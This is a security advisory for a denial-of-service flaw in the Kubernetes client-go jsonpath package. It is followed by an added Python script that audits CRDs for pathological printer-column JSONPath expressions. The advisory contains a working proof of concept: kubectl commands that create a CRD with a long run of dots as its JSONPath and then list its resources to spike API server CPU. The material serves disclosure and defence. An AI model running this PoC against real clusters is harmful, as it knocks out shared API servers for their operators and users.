Denial of Service (DoS) Affecting github.com/kubernetes/kubernetes/staging/src/k8s.io/client-go/util/jsonpath package, versions <1.19.0-rc.4
Snyk ID SNYK-GOLANG-GITHUBCOMKUBERNETESKUBERNETESSTAGINGSRCK8SIOCLIENTGOUTILJSONPATH-597670
- published 24 Jul 2020
- disclosed 24 Jul 2020
- credit lazydog
How to fix?
Upgrade github.com/kubernetes/kubernetes/staging/src/k8s.io/client-go/util/jsonpath to version 1.19.0-rc.4 or higher.
Overview
github.com/kubernetes/kubernetes/staging/src/k8s.io/client-go/util/jsonpath is a template engine using JSONPath syntax (see http://goessner.net/articles/JsonPath/). In addition, it provides {range} {end} to iterate over lists and slices.
Affected versions of this package are vulnerable to Denial of Service (DoS). A user able to create CRDs could create a malicious CRD whose additionalPrinterColumns entry carries a pathological JSONPath expression (in the PoC below, a long run of consecutive dots). The API server parses and evaluates that expression when it renders a list of the custom resources as a table, so listing the CRs causes enormous amounts of CPU usage on the API server. Note that once the CRD exists, the expensive step is the list itself: any user permitted to list that resource triggers it, not only the user who created the CRD.
PoC
kubectl create -f - <<EOF
apiVersion: apiextensions.k8s.io/v1beta1
kind: CustomResourceDefinition
metadata:
  name: foos.example.com
spec:
  group: example.com
  scope: Namespaced
  names:
    plural: foos
    singular: foo
    kind: Foo
  version: v1
  additionalPrinterColumns:
  - name: FOO
    type: string
    JSONPath: ........................................................................................................................................................................................................
EOF
kubectl create -f - <<EOF
apiVersion: example.com/v1
kind: Foo
metadata:
  name: foo-cr
spec:
  foo:
    bar:
      baz:
        qux: data
EOF
kubectl get foo
The API server's CPU usage rises sharply while it serves the list: the table conversion for the FOO column parses and evaluates the pathological JSONPath expression for the objects returned, and that expression is expensive to process in the affected versions.
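Because the dangerous input lives in the CRD object rather than in the custom resources, the practical check on a cluster that cannot be upgraded yet is to audit every CRD's printer columns. The following is an added example (not Snyk's or the Kubernetes project's code) that reads the JSON produced by `kubectl get crd -o json` and flags printer-column JSONPath expressions that look pathological. It handles both apiextensions.k8s.io/v1beta1 (spec.additionalPrinterColumns, key `JSONPath`) and v1 (spec.versions[].additionalPrinterColumns, key `jsonPath`). The flagging thresholds (a run of three or more consecutive dots, or an expression longer than 256 characters) are assumptions chosen for this example, not values taken from the advisory or the upstream fix, and the sample CRD list is constructed inline so the script runs offline.

```python
"""Audit CustomResourceDefinitions for pathological printer-column JSONPath
expressions, the attack vector shown in the PoC above.

Added example, not code from the advisory or from Kubernetes. Feed it the
output of `kubectl get crd -o json`; a constructed sample is embedded below
so it runs without a cluster.
"""
import json
import re
import sys

# Heuristic thresholds (assumptions for this example): the Kubernetes
# JSONPath dialect uses ".." for recursive descent, so three or more
# consecutive dots never form a meaningful expression; and real printer
# columns use short paths, so an unusually long expression is itself
# worth a look.
MAX_CONSECUTIVE_DOTS = 2
MAX_EXPRESSION_LENGTH = 256

_DOT_RUN = re.compile(r"\.{%d,}" % (MAX_CONSECUTIVE_DOTS + 1))


def is_suspicious(expr):
    """Return a reason string if the expression looks pathological, else None."""
    if len(expr) > MAX_EXPRESSION_LENGTH:
        return "expression length %d exceeds %d" % (len(expr), MAX_EXPRESSION_LENGTH)
    match = _DOT_RUN.search(expr)
    if match:
        return "run of %d consecutive dots" % len(match.group(0))
    return None


def printer_columns(crd):
    """Yield (version, column) pairs for every printer column in one CRD.

    v1beta1 CRDs put the columns at spec.additionalPrinterColumns (with a
    top-level spec.version); v1 CRDs put them under each entry of
    spec.versions. Both layouts are walked.
    """
    spec = crd.get("spec", {})
    for col in spec.get("additionalPrinterColumns") or []:
        yield spec.get("version", ""), col
    for ver in spec.get("versions") or []:
        for col in ver.get("additionalPrinterColumns") or []:
            yield ver.get("name", ""), col


def audit(crd_list):
    """Return a list of findings for a kubectl List object of CRDs."""
    findings = []
    for crd in crd_list.get("items", []):
        name = crd.get("metadata", {}).get("name", "<unnamed>")
        for version, col in printer_columns(crd):
            # v1 spells the key jsonPath, v1beta1 spells it JSONPath.
            expr = col.get("jsonPath", col.get("JSONPath", ""))
            reason = is_suspicious(expr)
            if reason:
                findings.append({"crd": name, "version": version,
                                 "column": col.get("name", ""), "reason": reason})
    return findings


# Constructed sample standing in for `kubectl get crd -o json`: one benign
# v1 CRD and one v1beta1 CRD carrying a dot-run expression like the PoC's.
SAMPLE = {
    "kind": "List",
    "items": [
        {
            "metadata": {"name": "widgets.example.com"},
            "spec": {
                "versions": [{
                    "name": "v1",
                    "additionalPrinterColumns": [
                        {"name": "STATUS", "type": "string", "jsonPath": ".status.phase"},
                    ],
                }],
            },
        },
        {
            "metadata": {"name": "foos.example.com"},
            "spec": {
                "version": "v1",
                "additionalPrinterColumns": [
                    {"name": "FOO", "type": "string", "JSONPath": "." * 200},
                ],
            },
        },
    ],
}


if __name__ == "__main__":
    # Pipe real cluster output in with: kubectl get crd -o json | python3 audit_crd.py
    data = json.load(sys.stdin) if not sys.stdin.isatty() else SAMPLE
    for finding in audit(data):
        print("%(crd)s %(version)s column %(column)s: %(reason)s" % finding)
```

Run against a live cluster with `kubectl get crd -o json | python3 audit_crd.py`; with no piped input it audits the embedded sample and reports the foos.example.com column. Any finding should be treated as an incident on an unpatched API server, since the CRD stays in place until someone deletes it and every list of that resource repeats the CPU cost.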